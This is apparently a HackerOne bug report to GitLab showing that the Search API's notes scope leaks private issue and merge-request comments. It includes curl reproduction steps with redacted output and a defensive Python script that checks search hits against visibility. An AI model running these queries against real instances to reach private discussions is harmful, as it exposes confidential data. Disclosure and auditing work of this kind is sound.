Elasticsearch leaks private merge request and issue discussions
HackerOne report #729760 by rpadovani on 2019-11-05, assigned to @jeremymatos:
Dev Issue
https://dev.gitlab.org/gitlab/gitlab-ee/issues/[REDACTED]
Summary
Using the Gitlab Search APIs, I am able to access objects of type notes that I shouldn't access. There are two kinds of these objects:
- notes in issues I have access to, but where I shouldn't see the single note
- notes in merge requests I don't have access to
Steps to reproduce
I have access to the issue where this note has been inserted, but not to the object referred to in the note itself:
11:32:29 in ~
➜ curl "https://gitlab.com/api/v4/projects/[REDACTED]/search?scope=notes&search=[REDACTED]" --header "PRIVATE-TOKEN: token" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 520 100 520 0 0 689 0 --:--:-- --:--:-- --:--:-- 688
[
{
"id": [REDACTED],
"type": null,
"body": "mentioned in issue [REDACTED]/gui#109",
"attachment": null,
"author": {
"id": [REDACTED],
"name": "[REDACTED]",
"username": "[REDACTED]",
"state": "active",
"avatar_url": "https://secure.gravatar.com/avatar/[REDACTED]?s=80&d=identicon",
"web_url": "https://gitlab.com/[REDACTED]"
},
"created_at": "2019-02-19T12:54:23.670Z",
"updated_at": "2019-02-19T12:54:23.670Z",
"system": true,
"noteable_id": [REDACTED],
"noteable_type": "Issue",
"resolvable": false,
"noteable_iid": [REDACTED]
}
]
11:32:47 in ~
➜ curl "https://gitlab.com/api/v4/projects?search=virtualcore" --header "PRIVATE-TOKEN: token" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2 100 2 0 0 3 0 --:--:-- --:--:-- --:--:-- 3
[]
11:32:56 in ~
➜ curl "https://gitlab.com/api/v4/projects?search=VirtualCore" --header "PRIVATE-TOKEN: token" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100
[]
I don't have access at all to the merge requests where these notes come from - as you know, the code / MRs / pipelines of customers.gitlab.com are private. This information is also (partially) available through the GUI (see screenshot):
11:50:14 in ~ took 2s
➜ curl "https://gitlab.com/api/v4/projects/[REDACTED]/search?scope=notes&search=*&per_page=1" --header "PRIVATE-TOKEN: token" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1682 100 1682 0 0 1752 0 --:--:-- --:--:-- --:--:-- 1750
[
{
"id": [REDACTED],
"type": "DiscussionNote",
"body": "[REDACTED]",
"attachment": null,
"author": {
"id": 4303974,
"name": "[REDACTED]",
"username": "[REDACTED]",
"state": "active",
"avatar_url": "https://assets.gitlab-static.net/uploads/-/system/user/avatar/[REDACTED]/avatar.png",
"web_url": "https://gitlab.com/[REDACTED]"
},
"created_at": "2019-11-04T21:10:41.148Z",
"updated_at": "2019-11-05T07:33:07.584Z",
"system": false,
"noteable_id": [REDACTED],
"noteable_type": "MergeRequest",
"resolvable": true,
"resolved": false,
"resolved_by": null,
"noteable_iid": 520
}
]
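The two manual checks above (is the note's parent issue/MR readable at all, and is the project a system note mentions visible to the requester) can be automated as a cross-check over the `notes` search scope. The block below is an added example, not code from this report or from GitLab; the API paths are the ones used in the reproduction, the project id 42, the note ids and the `acme/gui` path are constructed sample data, and the "mentioned in ..." body format is assumed from the single example shown. The HTTP layer is injected so it runs offline here; for a live run, pass a function that issues GET https://gitlab.com/api/v4<path> with a PRIVATE-TOKEN header.

```python
"""Cross-check GitLab Search API results in the `notes` scope against the
visibility of the objects they belong to.

Added example, not from the HackerOne report or from GitLab. Two checks:
(1) can the requester read the issue/MR the note is attached to, and
(2) for system notes like "mentioned in issue <path>#<iid>", is the
referenced project visible to the requester at all.
`fetch(path) -> (status, json)` is injected so the check runs offline.
"""
import re
from dataclasses import dataclass
from typing import Any, Callable, List, Tuple
from urllib.parse import quote

Fetch = Callable[[str], Tuple[int, Any]]

# Assumed shape of a cross-project system note body, based on the one
# example in the report ("mentioned in issue <namespace/project>#109").
MENTION_RE = re.compile(
    r"mentioned in (?:issue|merge request) (?P<path>[\w./-]+)[#!](?P<iid>\d+)"
)
NOTEABLE_ENDPOINT = {"Issue": "issues", "MergeRequest": "merge_requests"}


@dataclass
class Finding:
    note_id: int
    reason: str
    detail: str


def search_notes(fetch: Fetch, project_id: int, query: str) -> List[dict]:
    status, body = fetch(
        f"/projects/{project_id}/search?scope=notes&search={quote(query, safe='')}&per_page=50"
    )
    return body if status == 200 else []


def parent_visible(fetch: Fetch, project_id: int, note: dict) -> bool:
    """A note should only be searchable if its parent issue/MR is readable."""
    endpoint = NOTEABLE_ENDPOINT.get(note.get("noteable_type"))
    if endpoint is None:
        return True  # snippets, commits etc. are out of scope for this check
    status, _ = fetch(f"/projects/{project_id}/{endpoint}/{note['noteable_iid']}")
    return status == 200


def mentioned_project_visible(fetch: Fetch, body: str) -> Tuple[bool, str]:
    """For system notes: is the project named in the mention searchable?"""
    m = MENTION_RE.search(body)
    if not m:
        return True, ""
    path = m.group("path")
    name = path.rsplit("/", 1)[-1]
    status, projects = fetch(f"/projects?search={quote(name, safe='')}")
    visible = status == 200 and any(
        p.get("path_with_namespace") == path for p in projects
    )
    return visible, path


def audit_notes(fetch: Fetch, project_id: int, query: str = "*") -> List[Finding]:
    """Return one Finding per note the requester should not have been shown."""
    findings: List[Finding] = []
    for note in search_notes(fetch, project_id, query):
        if not parent_visible(fetch, project_id, note):
            findings.append(Finding(note["id"], "parent-not-visible",
                                    f"{note['noteable_type']} iid {note['noteable_iid']}"))
        if note.get("system"):
            visible, path = mentioned_project_visible(fetch, note.get("body", ""))
            if not visible:
                findings.append(Finding(note["id"], "mentions-inaccessible-project", path))
    return findings


# ---- constructed sample data (not from the report; ids are made up) ----
SAMPLE_NOTES = [
    {"id": 1, "system": True, "body": "mentioned in issue acme/gui#109",
     "noteable_type": "Issue", "noteable_iid": 7},
    {"id": 2, "system": False, "type": "DiscussionNote", "body": "looks wrong at L12",
     "noteable_type": "MergeRequest", "noteable_iid": 520},
    {"id": 3, "system": False, "body": "thanks, fixed",
     "noteable_type": "Issue", "noteable_iid": 7},
]


def sample_fetch(path: str) -> Tuple[int, Any]:
    """Offline stand-in for the API: issue 7 is readable, MR 520 and the
    'acme/gui' project are not, mirroring the situation in the report."""
    if path.startswith("/projects/42/search?scope=notes"):
        return 200, SAMPLE_NOTES
    if path == "/projects/42/issues/7":
        return 200, {"iid": 7}
    if path.startswith("/projects?search="):
        return 200, []  # project search comes back empty, as in the report
    return 404, {"message": "404 Not Found"}


def run_sample() -> List[Finding]:
    return audit_notes(sample_fetch, 42)


if __name__ == "__main__":
    for f in run_sample():
        print(f"note {f.note_id}: {f.reason} ({f.detail})")
```

Against the sample data this flags note 1 (system note mentioning a project the requester cannot find) and note 2 (discussion note whose merge request returns 404), while note 3 passes. The same two conditions are what the search backend should have enforced before returning a hit, so any finding on a live run is a visibility bug in search, not in the per-object endpoints.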
Impact
Leaking notes and discussions that are private. This reveals discussions, names of files referred to in discussions (with git sha), private project names and probably more.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
*[REDACTED]